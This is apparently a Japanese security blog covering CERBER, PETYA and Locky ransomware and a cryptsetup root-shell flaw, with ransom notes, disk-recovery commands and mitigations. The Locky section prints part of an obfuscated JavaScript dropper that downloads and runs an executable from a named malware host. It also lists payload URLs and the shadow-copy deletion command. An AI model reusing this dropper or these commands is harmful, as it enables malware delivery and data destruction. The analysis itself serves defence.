セキュリティ事件、サイバー攻撃

脅威情報

音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

キーワード: Ransomware, ランサムウェア, 復号, 解除, 暗号化, 解除ツール, 復号ツール, Decryptor 

 

このエントリーをはてなブックマークに追加

1. CERBER 概要

スポンサーリンク

ランサムウェア(ransomware)とは、感染するとハードディスク内のファイルを勝手に暗号化して脅迫し、復号・解除キーと引き換えに金銭を要求するマルウェア(ウイルス)です。ランサムウェアには、CryptoLocker や TeslaCrypt、 Locky など多くの種類があります。これらのランサムウェアは、暗号化すると脅迫文を表示して金銭を要求するものでしたが、CERBER と呼ばれるマルウェアは音声で脅迫します。また、身代金の支払い期限が設定されており、期限が過ぎると身代金の金額を吊り上げ、支払いを迫ります。

ランサムウェア CERBER は、メール添付ファイル経由より、改ざんされたウェブサイトや広告にアクセスすることで感染するケースが多いようです。改ざんされウェブページにアクセスすると、ウェブブラウザのプラグインである Flash Player や Java などの脆弱性を攻撃するエクスプロイトキット (Magnitude Exploit Kit や Rig Exploit Kit など) を設置したサイトにリダイレクトされ、攻撃が成功すると Cerber がダウンロード実行されて感染します。

CERBER は、何度かバージョンアップされており、2016年11月末にはデータベースファイルを暗号化する機能を追加したバージョン 4.x が確認されています。トレンドマイクロの調査によると、CERBER 4.0 で暗号化対象となるデータベースファイルとしては、Microsoft Access、SQL Server, MySQL, Oracle、MySQL のほか、会計ソフト、給与計算ソフト、医療管理データベースソフトウェアに関連するファイルも含まれています。

2. CERBER による暗号化と脅迫文

CERBER に感染後のデスクトップ画面

他のランサムウェア(ransomware)と同じく、感染後にディスクトップの壁紙が脅迫文に変更されます。

cerber4

CERBER の脅迫文

脅迫文は多数の言語に対応しており、日本語に対応しています。ファイル形式は、HTML ではんく HTA 形式となっています。

cerber0

3. CEBER で暗号化されたファイルの復号方法(1回のみ)

CERBER の脅迫文に記載されているパーソナルページで、無料で 1つファイルの復号を試すことができます。

※ 購入を推奨している訳ではありません。

Tor ブラウザで脅迫文に記載されているパーソナルページにアクセスすると、言語を選択する画面が表示されます。日本語、中国語、ロシア語など多くの言語に対応しているようです。

cerber1

ロボットアクセス回避のためのキャプチャ認証が入っていました。

セキュリティ上の理由のため、以下でロボットではなく、ヒトであることを確認してください。

cerber2

メニュー画面が表示されます。支払い期限の時間などが表示されています。このページの上部に「1つのファイルを無料で復号化」というメニューがあります。

ドキュメント、写真、データベース、その他の重要なファイルは暗号化されています!

ファイルを復号するには、特別なソフトウェア - <<Cerber Decryptor>> をご購入いただく必要があります。
すべての取引は bitcoin ネットワーク内でのみ実行されます。
これから5日間だけ、B1.000の特別価格でこの製品をお求めいただけます。
5日経過後は、この製品の価格はB2.000になります。

スポンサーリンク

cerber3

上記メニューから「1つのファイルを無料で復号化」にアクセスすると、無料で1つのファイルを復号できる特別な機会!」と書かれたページが表示されます。「ファイルをアップロード」のボタンを押して、復号したいファイルを選びます。復号できるファイルは、サイズが2048バイトまでになっています。

今なら、無料で1つのファイルを復号化できる特別な機会!
サービスが本当に役に立つかどうかを確認後、<<Cerber Decryptor>> プログラムにお払い頂いた後で、1つのファイルを復号化することができます

cerber6

復号が成功すると「復号化されたファイルのダウンロード」というボタンが表示されるので、クリックしてダウンロードします。

cerber8

ダウンロードされるファイル名は Decrypted.zip となっており、解凍・展開すると復号されたファイルが確認できました。

cerber10

4. CERBER で暗号化されたファイルの復号方法

スポンサーリンク

初期の CERBER バージョン1 については、トレンドマイクロからファイルの暗号化を解除するツール( Ransomware File Decryptor )が提供されています。

5. 関連URL

LinuxディストリビューションにEnterキーを押し続けるだけで root シェルを開くことが出来る深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)

LinuxディストリビューションにEnterキーを押し続けるだけで root シェルを開くことができる深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)

       

キーワード: Linux, Ubuntu, RedHat, LUKS, cryptsetup,  initramfs(initial RAM file system), ハードディスク暗号化,

1. Cryptsetup Initrd root Shell (CVE-2016-4484) の概要

スポンサーリンク

Linuxディストリビューションで使われているハードディスク暗号化のための標準的な使用である LUKS (Linux Unified Key Setup on disk format) に深刻な脆弱性(Cryptsetup Initrd root Shell CVE-2016-4484)が見つかった。この脆弱性は、LUKSのユーティリティである cryptsetup に存在するもので、システムを起動時の認証画面で Enter キーを押し続けるだけで簡単に悪用することができる。この脆弱性を悪用するとコンソールから root シェルが起動し、ハードディスクのコピーや破壊活動、ネットワークを設定して通信などが可能となり、悪用された場合の影響は大きい。暗号化されたハードディスクの内容にはアクセスできないことはない。

影響を受けるディストリビューションには、「Red Hat Enterpise Linux」(RHEL)、「Fedora」、「Ubuntu」、「Debian」、「SLES」などが含まれる。 

物理的に直接アクセスできる図書館や空港、学校などに設置された端末、ATMなどは攻撃を受ける可能性が高い。その他、リモートでコンソール画面にアクセスできるクラウドサービスなども影響を受ける可能性がある。

スポンサーリンク

2. Cryptsetup Initrd root Shell (CVE-2016-4484)の脆弱性検証

       

(1) Ubuntu を起動すると認証画面が表示される 

ubuntu1

       

(2) 「Enter」を押して認証失敗する 

ubuntu2

       

(3)  「Enter」を押し続けて、何度か認証失敗 

ubuntu3

       

(4) initramfs(initial RAM file system)が起動

        Build-in Command として、mount や dd、ifconfig、wget など多くのコマンドが利用可能 

ubuntu4

スポンサーリンク

3. 対策

各ディストリビューションの情報を確認して、アップデートしてください。

4. 関連URL

PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア

PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア

 

スポンサーリンク

 

キーワード: PETYA、ウイルス、マルウェア、ランサムウェア、復元、復号、復旧、decrypt、MBR、MFT、ransomware, Virus

このエントリーをはてなブックマークに追加

 

目次

 
   

1. PETYA ウイルスとは

   

2. PETYA ウイルス感染時の画面

   

3. 書き換えられたMBR、MFTなど

   

4. ファイルの復旧について

   

5. 暗号化されたディスクの復号方法

 

1. PETYAウイルスとは

 

PETYAウイルスは、感染するとMBRMFT(マスターファイルテーブル)を上書きしてPCを起動不能するランサムウェアの一種です。PETYAウイルスを実行すると、Windowsが急に落ちて、システム再起動が発生します。PCを起動するとドクロマークの絵を表示した後、ハードディスクを軍事レベルのアルゴリズムで暗号化した、復号するための鍵を購入するために手続きをするように要求する文書を表示します。要求額は約0.9 BITCOINになっていました。

 

PETYA ウイルスに感染させてハードディスクの内部を確認したところ、ハードディスク全体が暗号化されている訳ではなく、MBRとMFTが部分的に書き換えられているだけのようでした。ファイルのデータは暗号化されずに残っているようです。また、軍事的なレベルのアルゴリズムで暗号化と書いてありましたが、MFTの書き換えはXOR処理のように見えます。

 

PETYAウイルスのプログラムコードを解析した訳ではなく、ハードディスクの一部を調査しただけなので正確ではないかもしれませんが、ハードディスク内のファイルデータは残っているようです。しかし、MFTが書き換えられているので、ファイル名やデータが格納されている位置(クラスタ番号)などがわからないので、ちゃんと復旧するのは大変そうです。foremost などのデータカービングソフトを使えば、ヘッダ・フッダが規定されているものについては、ある程度自動で復元できそうです。MFTレコード内に直接データが保存される小さなサイズのファイルに関しては、データが書き換えられてしまっていると思います。

 

NTFS 以外のファイルシステムの場合どうなるのかは調べられていません。

 

 

2. PETYA ウイルスに感染時の画面

 

スポンサーリンク

 

① PETYAウイルスを実行すると、強制的に Windows が落ちてシステム再起動がかかります。

 

petya_ico

 

②PCが立ち上がると、リカバリのための CHKDSKを実行しているような画面が出てきます。

 

PETAYA-1

 

③ ②が終わると、赤白点滅させながらドクロマークの絵を表示します。

 

PETYA-2PETYA-3

 

④ ハードディスクを暗号化したこと、復号するための鍵の購入方法が表示されます。

 

PETYA-4

 
   

You became victime of the PETYA RANSOMWARE!

   

The harddisks of your computer have been encrypted with an millitary grade encryption algorithm. There is no way to restore your data without a special key. You can purchase this key on the darknet page shown in step 2.

   

To purchase your key and restore your data, please follow these three easy steps:

   

1. Download the Tor Browser at “https://www.torproject.org/”. If you need help, please google for “access onion page”.

   

2. Visit one of the following pages with the Tor Browser:

   

   http://petyaXXXXXXXX

   

   http://petayaXXXXXXX

   

3. Enter your personal decryption code there:

   

   XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX…

   

If you already purchased your key, please enter it below.

 

 

3. 書き換えられたMBR、MFTなど

 

スポンサーリンク

 

 

暗号化されたファイルの復旧する 3 つの方法を紹介します。

 

①第0ブロック MBRの書き換え

 

mbr

 

左が正常なMBR、右がPETYAに書き換えられたMBRです。オフセット 446バイト以降のパーティションテーブルは書き換えられていませんが、前半のブートストラップローダー部分が書き換えられていることがわかります。

 

 

 

②第1ブロックから第33ブロック目の書き換え

 

block1-33

 

第0ブロック目のMBR以降、第1ブロックから第33ブロック目は通常 0x00 になっていますが、PETYAウイルスによって 0x07 で XOR されているように見えます。XORとは限りませんが。

 

 

 

③ 第34ブロック目~第49ブロックまでの書き換え

 

推測ですがPETYAウイルスに感染後に表示されるドクロマークや案内を表示すると思われるプログラムが入っていました。

 

 

 

④ 第50ブロック目以降から第1パーティション直前まで

 

特に書き換えはないようです。

 

 

 

MFT(マスターファイルテーブル)の書き換え

 

MFT-Mirror

 

左が正常なMFTレコードの一部(MFTMirrのレコード)です。右はPETYAウイルスで書き換えられたMFTレコードになります。正常時の0x0の部分からキーを推測して XOR すると一部は戻せました。途中でパターンが変わるので、そのパターンをプログラム解析で確認できれば復号できそうです。

 

時間があればもう少し詳しく調べてみたいと思います。

 

 

 

4. ファイルの復旧について

 

MBR、MFTは書き換えられていますが、ファイルデータはそのまま残っているようなので、試しにファイルが取り出せるか確認してみました。

 

感染前の C:\Windows\notepad.exe が クラスタ番号 169258 から 44 クラスタ分あることが分かっていたので、感染後のハードディスクから該当部分を dd コマンドで取り出してみました。

 
   

# dd if=infected-disk.dd skip=`expr 169258 * 8 + 2048` count=`expr 44 * 8` > notepad.dd

 

notepad.exe は 179,712バイトなので、末尾の余計な部分をバイナリエディタで削って、MD5ハッシュ値を確認します。

 
   

# md5sum notepad.dd      
d378bffb70923139d6a4f546864aa61c  notepad.dd

 

感染前の C:\Windows\notepad.exe の MD5 のハッシュ値である  d378bffb70923139d6a4f546864aa61c と一致しました。少なくともこの部分のファイルデータは書き換えられてないようです。

 

 

5. 暗号化されたディスクの復号方法

 

暗号化されたディスクを復号するための解除キーを解析してくれるサイト(PETYA-PAY-NO-RANSOM)が公開されています。

 

Petya Ransomware's Encryption Defeated and Password Generator Released http://www.bleepingcomputer.com/news/security/petya-ransomwares-encryption-defeated-and-password-generator-released/

 

PETYA-PAY-NO-RANSOM(https://petya-pay-no-ransom-mirror1.herokuapp.com/)

 

上記の PETYA-PAY-NO-RANSOM を利用した PETYA RANSOM の解除を試してみました。暗号化は解除でき、正常にWindowsを起動することが確認できました。試してみた手順を紹介します。

 

PETYA-PAY-NO-RANSOM に下記①②の情報を貼り付けて「Submit」ボタンを押すと、解除キーが表示されます。このキーをPETYA RANSOMWARE のキー入力画面に、入力すると暗号化が解除されて正常にWindowsを起動することができます。

 
   

① 暗号化されたハードディスクのセクタ55 のデータをBASE64エンコードした情報

   

② 暗号化されたハードディスクのセクタ54 のオフセット 33 から 8バイト分のデータをBASE64エンコードした情報

 

上記①②の情報を取得するためのツール Petya Sector Extractor が下記URLで提供さてれています。  Windows 上で動作するGUI プログラムです。

 

http://download.bleepingcomputer.com/fabian-wosar/PetyaExtractor.zip

 

今回は、別途 Windows マシンにHDDをつなぎかえるのが面倒だったため、上記 Petaya Sector Extractor は使わずに、Bootable Linux CD でブートして dd コマンドと Base64 コマンドで取得する方法にしました。

 

 

(1) Bootable Linux CD で PETYA RANSOMWARE に感染したマシンを起動します

 

Bootable Linux なら何でも良いのですが、今回は Deft Linux を使いました。

 

 

(2) Linux が起動したら下記のコマンドを実行して①②の情報を取得します

 

感染したマシンのハードディスクが、デバイス名 /dev/sda として認識されています。この /dev/sda から該当データを取得することになります。下記、具体的なコマンドになります。

 

①の暗号化されたハードディスクのセクタ55 のデータをBASE64エンコードした情報を取得

 
   

deft ~ % dd if=/dev/sda bs=512 skip=55 count=1 2>/dev/null | base64      
/cc3NxMWNzenSDc3rzs3N+37Nzfq/zc3baU3NyfGNzc3BTc3N8g3N1RtNzdJoTc3K6M3N6tgNzft      
1zc33P03N/7HNzeTFjc3p7Q3N6/9NzftvDc37P83N+3lNzcn2Dc3NTU3N7c3NzdUbTc3SaI3N6um       
NzerZDc3bSg3N9z9Nzf9xzc3E1Y3N6cMNzcvfTc37fw3N+r/NzdtZTc3J8Q3NzMHNzc3iDc3Um03       
N8miNzerIzc3q343N+36Nzff/Tc3/cc3N5NVNzenoDc3r7s3N+07Nzfq/zc3bSU3NyfGNzcxMTc3       
N/c3N1JtNzdJIjc3K6M3N6tkNzdtqDc33/03N/7HNzcT1Tc3pxQ3N687Nzdtujc37P83N+0lNzcn       
2Dc3PzU3N7cINzdTbTc3yWI3N6ulNzerfDc37Tk3N9/9Nzf8xzc3ExY3N6cONzevfDc3bTs3N+r/       
NzdtZTc3J8I3Nz0HNzc3CDc3VW03N0nhNzcrpTc3q2A3N226Nzfe/Tc3/cc3N5NWNzenADc3L/03       
N+38Nzfq/zc3bWU3NyfENzc7PTc3N0g3N1NtNzdJojc3qyM3N6t+Nzdt+Tc33/03N/vHNzeTFjc3       
pww3N688NzftOzc36v83N20lNzcnwjc3OT03NzfINzdSbTc3SeE3NyulNzerYDc3bbo3N979Nzc=

 

②の暗号化されたハードディスクのセクタ54 のオフセット 33 から 8バイト分のデータをBASE64エンコードした情報を取得

 
   

deft ~ % dd if=/dev/sda bs=1 skip=`expr 33 \+ 512 \* 54` count=8 2>/dev/null | base64      
LSgLXoh++aQ=

 

上記コマンド結果を USB メモリや SSH などのネットワーク経由で取得し保存しておきます。

 

 

(3) (2) で得た情報を「PETYA-PAY-NO-RANSOM(https://petya-pay-no-ransom-mirror1.herokuapp.com/)」のフォームに貼り付けて Submit します

 

decrypt1

 

しばらくすると解除キーが表示されます。ここでは Your key is: の行にある「XxNxRx3xExTxTxsx」が解除キーになります。

 

decrypt2

 

 

(4) (3)で表示された解除キーを PETYA の画面に入力します

 

decrypt4

 

解除キーを入力すると、復号処理が実行されます。

 

decrypt5

 

しばらくすると復号処理が完了すると、マシン再起動の表示が出ます。

 

decrypt6

 

再起動すると正常にWindowsが起動します。

 

 

 

スポンサーリンク

Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法

更新日:
2016-03-29 「感染しないための対策」を追記
2016-03-27 「感染時の動作」、「Locky Decrytor の購入画面」をを追記

Locky Virus - 日本語で身代金を要求するランサムウェアウイルスの対処方法

キーワード: ウイルス、Locky、マルウェア、ランサムウェア、復元、復号、復旧、decrypt, js、javascript、Document2、ransomware, virus, thor, osiris, zzzzz, aesir

このエントリーをはてなブックマークに追加 

目次

1. Locky ウイルスとは

2. 脅迫文

3. 暗号化されたファイルの復旧方法

4. メール添付ファイルの例

5. Locky ウイルスのダウロードURL

6. Locky ウイルス感染時の動作

7. 感染しないための対策

8. 関連リンク

スポンサーリンク

1. Locky ウイルスとは

Locky ウイルスは、感染するとPC内のファイル(テキストやオフィスファイル、画像、動画ファイルなど)を勝手に暗号化してしまうランサムウェアと言われる種類のウイルスです。暗号化されたファイルは、拡張子が「Locky」 となってしまうことから通称「Locky」と呼ばれています。今までのランサムウェアの脅迫文は日本語対応していないものがほとんどでしたが、Locky は日本語環境であれば日本語の脅迫文を作成して表示します。

感染経路としては、メール添付ファイルと脆弱性を攻撃するWebサイトの大きく2つがあります。メール添付ファイルでの感染は、実行すると Locky ウイルスをダウンロードして実行する JavaScriptファイルが含まれた ZIP ファイルが添付されているケースが多いです。その他 rar 拡張子の添付ファイルのケースもあります。また、改ざんされたWebサイトでの感染では、そのWebサイトを見ると Adobe Flash などの脆弱性を攻撃して自動的に Locky Virus をダウンロードして実行する手法(ドライブバイダウンロード)による感染が多く報告されています。このWebサイト経由での感染は、Adobe Flash や IE などのソフトウェアを最新にしておけば感染することはほどんどありません。ランサムウェアなどのウイルスに感染しないように、必ずソフトウェアはアップデートして最新のバージョンにしておきましょう。

1.2. Locky 亜種

Locky ウイルスが出現して間もなく亜種が出回りはじめました。Locky亜種は、初期のLocky と比べて、ダウンロードされるウイルス本体の実行ファイル形式(EXEからDLL形式)や暗号化後のファイル名の形式、拡張子名(.thor.aesir.zzzzz.osirisなどが変わっています。目的はかわらず、感染PC内のファイルを暗号化して人質にして、身代金(ビットコイン支払い)を要求することです。

Locky亜種は、主にメールの添付ファイルとして送られてきます。添付されるファイルの形式は、以下が確認されています。

添付ファイルの形式 ファイルの拡張子
zip zip
The Witcher 2 Game Archive dzip
Microsoft Office doc, docx, docm
  xls, xlsx

zip, dzip などの圧縮ファイルは、展開すると js, wsf, vbs などのスクリプトファイルが入っており、実行してしまうと Locky 亜種の本体であるDLLプログラムをダウンロードして実行します。

doc, docm などのMicrosoft Office のオフィスファイルには、開くと Locky亜種をダウンロードするマクロが入っています。

2. 脅迫文

Locky ウイルスに感染すると表示される日本語の脅迫文です。
  • _Locky_recover_instructions.bmp

_Locky_recover_instructions

  • _Locky_recover_instructions.txt

!!! 重要な情報 !!!!

すべてのファイルは、RSA-2048およびAES-128暗号で暗号化されています。  
RSAの詳細については、ここで見つけることができます:  
http://ja.wikipedia.org/wiki/RSA暗号  
hxxp://ja.wikipedia.org/wiki/Advanced_Encryption_Standard

あなたのファイルの復号化は秘密鍵でのみ可能であり、私たちの秘密のサーバー上にあるプログラムを、復号化します。  
あなたの秘密鍵を受信するには、リンクのいずれかに従います:  
1. hxxp://i3ezlvkoi7fwyood.tor2web.org/AAF92AC11ABCDEF  
2. hxxp://i3ezlvkoi7fwyood.onion.to/AAF92AC11ABCDEF  
3. hxxp://i3ezlvkoi7fwyood.onion.cab/AAF92AC11ABCDEF

このすべてのアドレスが使用できない場合は、次の手順を実行します。  
1. ダウンロードして、Torのブラウザをインストールします: hxxps://www.torproject.org/download/download-easy.html  
2. インストールが正常に完了したら、ブラウザを実行し、初期化を待ちます。  
3. アドレスバーにタイプ: i3ezlvkoi7fwyood.onion/AAF92AC11ABCDEF  
4. サイトの指示に従ってください。

!!! 個人識別ID: AAF92AC11ABCDEF !!!

  • Locky Decryptor 購入画面

暗号化されたファイルを復元するためのソフトウェアである Locky Decryptor の要求額は 1.0 Bitcoin のようです。日本円に換算すると5万円弱くらいでしょうか。暗号化されたファイルの重要性によっては、払ってしまいそうな金額です。

脅迫文と同じく、英語、日本語のほか、韓国語、ドイツ語、フランス語、イタリア語など多くの言語をサポートしています。

身代金を払うことは、犯罪者にお金を払ってしまうことになってしまいますし、犯罪を助長することになってしまうのでお勧めしませんが、バックアップなどから復旧できない大切なデータが被害にあった場合は、身代金を払って復号するしか手はなさそうです。

LockyDecryptor 

3. 暗号化されたファイルの復旧方法

スポンサーリンク

暗号化されたファイルの復旧する 3 つの方法を紹介します。

(1) バックアップから復旧

バックアップから復旧することが一番簡単な方法です。ランサムウェアの被害に限らず、インシデントが発生するとバックアップの大切さがわかります。

(2) ボリュームシャドーコピーからの復旧

Vista/7 以降のWindowsは、標準でファイルの自動バックアップサービスが動いています。ファイルのプロパティのタブで「以前のバージョン」で表示されるものがバックアップされたファイルになります。

いつの時点のボリュームシャドーコピーがあるかなどを確認する方法です。管理者権限のコマンドプロンプトで、vssadmin か wmic コマンドを実行すると表示されます。その他、エクスプローラのフォルダやファイルのプロパティから「以前のバージョン」タブを確認する方法もあります。

> vssadmin list shadows

> wmic.exe shadowcopys

ボリュームシャドーコピーが残っていれば、Shadow Explorer というソフトウェア(http://www.shadowexplorer.com/)を使うことで以前のバージョンのファイルを復元することができます。

Locky ウイルスは、感染時にボリュームシャドーコピーを削除するコマンドを実行します。このコマンドには管理者権限が必要なので、一般ユーザ権限で操作をしていたのであれば削除されずに残っている可能性があります。

(3) アンチウイルスベンダーの復号ツールを使う(未確認)

本当に復号できるのか確認検証できていませんが、下記URL に Locky ウイルスに暗号化されたファイルを復元する方法が記載されています。

How to Decrypt Files Affected by Locky

http://www.im-infected.com/virus/remove-locky-ransomware-virus-removal.html

DrWeb の FTP サイトに復号ツール(ftp://ftp.drweb.com/pub/drweb/tools/te94decrypt.exe)があるようですが、認証が必要でダウンロードできませんでした。DrWeb を購入しているユーザのみに公開されているのかもしれません?。DrWeb のライセンスを持っていないので詳細は不明です。

このツールを使って下記コマンドを実行することにより復号できるようです。(確認できていないので、本当に復元できるか不明です)

te94decrypt.exe -k 85

上記コマンドで復号できない場合は、-k オプションの値を -k 87, -k 88, -k 90, -k 106, or –k186 のように変えて試すとよいようです。

(4) 身代金を支払う

最後の手段ですね。

スポンサーリンク

4. メール添付ファイルの例

Locky ウイルスをダウンロードする JavaScript ファイル (ZIP 圧縮ファイル)を添付したメールの一例です。以下、Locky ウイルスに関するメールの特徴です。

  • 件名は Document 2 が多い
  • 差出人と宛先が自分のメールアドレス
  • 本文はなしが多い
  • 添付ファイルは zip で Locky Virus をダウンロードする js ファイルが含まれている

 

4.1 メール添付ファイルの例

  • Scanned images

件名 Scanned image
差出人 "admin" lands804@nifty.com
日時 Fri, 11 Mar 2016 21:28:25 +0530 (IST India Standard Time)
X-Mailer Internet FAX, MGCS
本文 Image data in PDF format has been attached to this email.
添付ファイル 11-03-2016-0424109259.zip (LUH5654603905.js)

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Fri, 18 Mar 2016 07:36:24 –0500 (EST アメリカ東部)
X-Mailer なし
本文 なし
添付ファイル Document 2.zip (中身は SKS6515937204.js)

  • Message from KFBT_C125

件名 Message from KFBT_C125
差出人 copier@nifty.com
日時 Date: Mon, 21 Mar 2016 10:01:42 -0700 (US,カナダ, メキシコ)
X-Mailer KONICA MINOLTA
本文 なし
添付ファイル SKFBT_C0125690141.zip

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 16:40:13 +0530 (IST India Standard Time インド)
X-Mailer iPhone Mail (13B143)
本文 なし
添付ファイル Document 2.zip (中身は FAM6542645213.js)

  • Document 2

  
件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 16:45:47 +0530 (IST India Standard Time インド)
X-Mailer iPhone Mail (13B143)
本文 なし
添付ファイル Document 2.zip (中身は QVR3975568919.js)

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 13:21:42 +0700 (ロシア?)
X-Mailer iPhone Mail
本文 なし
添付ファイル Document 2.zip

  • Locky をダウンロードする Javascript の例(一部)

LUH5654603905.js (一部)

LnOKenpxqU = "If the nodes are siblings, we can do a quick check} else if ( aup === bup ) {return siblingCheck( a, b );";
String.prototype.harmonize = function () { return this.substr(0, 1); };
var zooFq = [("through","sesame","admissions","holes","T")+("scripts","beautify","attacked","arrangements","OQ")+("algeria","cucumber","relation","NF")+"JjAV"+"sY", "c"+("sponsorship","endorsed","finish","JbVL")+"Lh"+"xN", "Expan"+"dE"+"nviron"+"me"+"ntStri"+("stork","sluggish","foxes","ngs"), ""+"%"+("prominent","queens","foregone","susanna","TE")+"MP%", "/BhyIDtNVwP" + ""+"."+("revolve","meyer","shift","reborn","exe"), "R"+("medline","demur","arbitrator","un"), ("tumbler","dense","A")+("craig","repine","tramadol","ct")+"iv"+"eX" + ("compression","brewery","guitar","")+"O"+"bj"+"ect", "QGGOKcpS", "QwMELac", "W"+"Sc"+"ri"+("foxes","torture","pt.") + ("problem","inscribe","melissa","octave","S"), "DKiwgen", ""+("withering","andrew","shorter","h")+"ell", "pVfOLaUink", ("throttle","cowboy","")+("amalgamation","breast","u")+"gb"+"IRD", ""+("guarantee","breastplate","interpreted","M")+"SX"+"ML2" + "."+"XM"+"LH"+("freeze","pounce","immensity","taciturnity","TTP")];
WeuTVCqwr = "Otherwise nodes in our document sort firstap[i] === preferredDoc ? -1 :bp[i] === preferredDoc ? 1 :0;};";   
zooFq.splice(7,2);   
var CTMoXJF = this[zooFq[7 * 8 - 50]];   
HWKBtgugje = "QADrAWHk";   
midnight = (("deleterious", "greenish", "bpRCgjnvY", "astuteness", "pxoHjzpzAa") + "FCIzdg").harmonize()   
publicitys = (("compared", "cheaper", "QBuFHmOIr", "architects", "shvjRYg") + "FjirdbbvG").harmonize()   
zooFq[7] = zooFq[7] + zooFq[9];   
zooFq[8] = "WyGszYG";   
zooFq.splice(8,3);   
var SjBMgLMBX = new CTMoXJF(zooFq[7]);   
SEVPbSzi = "}Walk down the tree looking for a discrepancywhile ( ap[i] === bp[i] ) {i++;";   
var ivPMRM = new CTMoXJF(zooFq[9]);   
rfQhFwb = "}Otherwise we need full lists of their ancestors for comparisoncur = a;while ( (cur = cur.parentNode) ) {ap.unshift( cur );}cur = b;while ( (cur = cur.parentNode) ) {bp.unshift( cur );";   
var giLwRPLp = SjBMgLMBX[zooFq[2]](zooFq[3]) + zooFq[4];   
SWlMAsjacQk = "}return i ?Do a sibling check if the nodes have a common ancestorsiblingCheck( ap[i], bp[i] ) :";   
ivPMRM.onreadystatechange = function () {   
if (ivPMRM[("animal","ferment","wince","r")+"ea"+("drummer","delicious","romany","thinking","dy")+"st"+("contributor","society","projects","oxygen","ate")] === 4) {   
   var aLcJyART = new CTMoXJF(""+"A"+("outlawed","mined","national","DO")+("derek","elizabethan","cleave","whisk","DB.")+("protuberance","stayed","proverbs","")+("terminus","dunno","madness","graphic","S")+"tr"+"eam");   
   aLcJyART.open();   
   KHvCvfBJOh = " return document; };";  

try {

LNqWai= "IE 9\"s matchesSelector returns false on disconnected nodesif ( ret || support.disconnectedMatch ||  As well, disconnected nodes are said to be in a document  fragment in IE 9 elem.document && elem.document.nodeType !== 11 ) {return ret;}} catch (e) {}";   
ivPMRM.open(("symptom","sigma","colin","G")+"ET", "h"+("propagate","thrown","johnny","ttp:")+"//"+("mohawk","impair","chinhu")+"an"+"oi"+"that.c"+"om/s"+"ys"+"te"+"m/logs/u"+"y78hn6"+("hogshead","action","54")+"e.exe", false);BxpYFBq = "} return Sizzle( expr, document, null, [ elem ] ).length > 0; };";   
ivPMRM[publicitys + ("illogical","quick-witted","grape","xerox","e") + (("promote", "moderately", "gnuUtaRFBS", "viscid", "impure", "nYAgsnHqfY") + "DudCuStvIn").harmonize() + (("miner", "squeal", "IKcQRgYhT", "blame", "concord", "dNdviLv") + "crpvqd").harmonize()]();   
RqrXhxjRF = "Sizzle.contains = function( context, elem ) {Set document vars if neededif ( ( context.ownerDocument || context ) !== document ) {setDocument( context );}return contains( context, elem ); };";   
SjBMgLMBX[zooFq[5]](giLwRPLp, 1, "qPdBvBqXfEO" === "HtIxotr"); xcwJYtK = " return val !== undefined ?val :support.attributes || !documentIsHTML ?elem.getAttribute( name ) :(val = elem.getAttributeNode(name)) && val.specified ?val.value :null; };";   
lrGyXANbYvX = "Sizzle.attr = function( elem, name ) {Set document vars if neededif ( ( elem.ownerDocument || elem ) !== document ) {setDocument( elem );";   
} catch (RaRfcWCIw) { };   
xyQVrCFOYxk = "} var fn = Expr.attrHandle[ name.toLowerCase() ],Don\"t get fooled by Object.prototype properties (jQuery #13807)val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ?fn( elem, name, !documentIsHTML ) :undefined;";

5. Locky ウイルスのダウロードURL

メールに添付された zip ファイルに含まれる js ファイルを実行すると HTTP アクセスして、Locky Virus をダウンロード実行します。HTTPアクセス先 URL の一例です。

hxxp://timefusewatches.com/system/logs/3523523.exe
hxxp://palat.com/system/logs/98h7b66gb.exe
hxxp://palahasit.com/system/logs/98h7b66gb.exe

/system/logs/*.exe となっているURLが多いようです。

6. Locky ウイルス感染時の動作

メール経由(js を含む添付ファイル)での感染時の動作です。感染してファイルを暗号化された後は、Locky Virus は自身を削除してしまうため残っていません。このため、暗号化された後に、アンチウイルスソフトウェアでフルスキャンしても見つかりません。メール添付されていた zip or Javascript は残っているので、これらが検知されることはあるかもしれません。

  1. Locky Virus をダウンロードするための Javascript を圧縮した zip ファイルを添付したメールが届く
  2. 添付された zip を開いて Javascript ファイル( 例: LUH5654603905.js)を実行すると、Locky Virus である実行ファイルがダウンロード実行される
  3. Volume Shadow Copy サービスで自動バックアップされているファイルをコマンドで削除する「C:\Windows\System32\wbem\WMIC.exeshadowcopydelete/nointeractive」
  4. Locky C2 (コントロール&コマンド)サーバに通信して暗号化に関する情報をやり取り (hxxp://xxxxxxx/main.php、hxxp://xxxxxxx/gate.php へのPOST通信が多い)
  5. ファイルの暗号化処理
  6. 脅迫文を作成して表示
  7. Locky Virus の実行ファイルを削除 「"C:\Windows\system32\cmd.exe" /c DEL %USERPROFILE%\DOCUME~1\TWRPUI~1.EXE」
             

7. 感染しないための対策

  • Adobe Flash Player を最新バージョンにアップデートする
  • Adobe Reader を最新バージョンにアップデートする
  • Java を最新バージョンにアップデートする
  • Internet Explorer を最新バージョンにアップデートする
  • Windows Update のセキュリティパッチをすべて適用する
  • アンチウイルスソフトの最新パターンにアップデートし、リアルタイム検知を有効にする
  • 問題なければ .js 拡張子の関連付けを、Javascript が実行できないプログラム(例えばnotepad.exe など)に変更する
  • js, wsf, vbs などの関連付けを無効にする
  • js, wsf, vbs などに関連付けられた WScript.exe をグループポリシーや権限などで実行禁止する
  • Microsoft Office のマクロ設定を警告表示もしくは無効にする

各種ソフトウェアやプラグインが最新バージョンになっているかは、情報処理推進機構 IPA が提供している MyJVN パージョンチェッカー(http://jvndb.jvn.jp/apis/myjvn/vccheck.html)で確認できます。

8. 関連リンク

Amazonをかたるフィッシングサイト

Amazonをかたるフィッシングサイト



概要

